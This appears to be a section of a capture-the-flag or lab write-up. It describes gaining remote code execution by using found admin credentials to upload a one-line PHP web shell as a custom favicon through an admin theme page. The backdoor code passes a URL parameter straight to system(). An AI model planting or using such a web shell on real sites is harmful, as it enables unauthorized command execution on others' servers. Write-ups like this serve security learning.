Exploitation

Following this tutorial i managed to upload a custom icon with the credentials found for the admin user.

I went to /Web/admin/manage_theme.php

Uploaded this backdoor.php

<pre>
<?php
system($_GET['cmd']);
?>
</pre>

Navigate to custom-favicon.php file, give some command as input and you have achieved RCE. Wohoooo!!!

PreviousmySQLNextPriv Escalation

Last updated